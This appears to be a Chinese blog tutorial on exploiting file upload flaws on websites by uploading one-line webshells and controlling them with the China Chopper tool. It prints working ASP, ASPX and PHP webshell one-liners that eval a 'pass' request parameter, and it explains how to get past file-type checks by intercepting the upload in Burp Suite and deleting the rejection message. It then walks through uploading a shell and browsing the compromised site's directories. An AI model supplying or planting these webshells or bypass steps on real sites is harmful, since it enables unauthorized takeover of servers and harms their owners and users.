文件上传一句话木马,用菜刀进行连接

菜刀工具
提取码:tg6t

关于文件上传

文件上传是指由于网站没有任何过滤或者防护措施有限,而会被上传一些恶意文件,有些用户利用这个漏洞上传一句话木马(webshell),上传成功后就可以利用中国菜刀工具来进行对这个网站后一步的攻击。

1.无任何上传限制
这里可以直接上传一句话木马然后用菜刀工具进行连接
2.限制了文件类型
有些网站会有对文件类型限制的,发送文件的途中网站会对文件的类型进行检测,看看文件的类型是否符合自己的要求,不符合的都会返回给服务器一串拒绝的代码,然后服务器则不会接受这个文件,这种情况就需要使用burpsuit进行拦截,一般拦截下来的信息会有拒绝上传的信息,把拒绝上传的信息删掉在发送回服务器则可以上传成功
3.限制文件的后缀
这个方法更加的暴力,直接限制了文件的后缀,这样网站会有很多限制可是也很有效的对文件上传漏洞有更好的防护

一句话木马

一句话木马就是webshell,就是一串函数生成的后门。
木马分为小马和大马
小马:一句话木马也成为小马,即整个shell代码量只有一行,一般是系统执行函数
大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到

一句话木马针对网站的类型选择,下面是几个网站类型对应的木马

asp一句话

<%eval request ("pass")%>

aspx一句话

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

php一句话

php @eval($_POST['pass']);?>

我们吧这些木马写入一个asp/aspx/php文件内,再利用文件上传吧文件上传

比如:

一个网站存在文件上传漏洞,
一个网站的文件上传

把php一句话写入php文件
php一句话木马
上传文件
在这里插入图片描述
上传成功后直接用菜刀连接这个网站的链接,右击文件管理就可以获取整个网站的目录了

  • 3
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值